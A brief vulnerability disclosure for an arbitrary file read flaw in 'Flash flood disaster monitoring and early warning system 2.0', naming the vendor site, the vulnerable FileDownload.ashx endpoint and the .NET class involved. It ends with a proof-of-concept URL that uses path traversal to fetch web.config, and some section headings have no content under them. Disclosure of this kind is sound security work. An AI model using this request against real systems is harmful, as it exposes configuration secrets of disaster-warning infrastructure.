Flash flood disaster monitoring and early warning system 2.0 has arbitrary file reading vulnerability
official website:http://www.cdwanjiang.com/
Vulnerability location:\Service\FileDownload.ashx
Tracking class:
\bin\MFCW.Web.dll // MFCW.Web.Service.FileDownload
Enter the Download function:
Enter the ResponseFile function:
POC:
http://xx.xx.xx.xx/Service/FileDownload.ashx?Files=../../web.config&FileSaveName=web
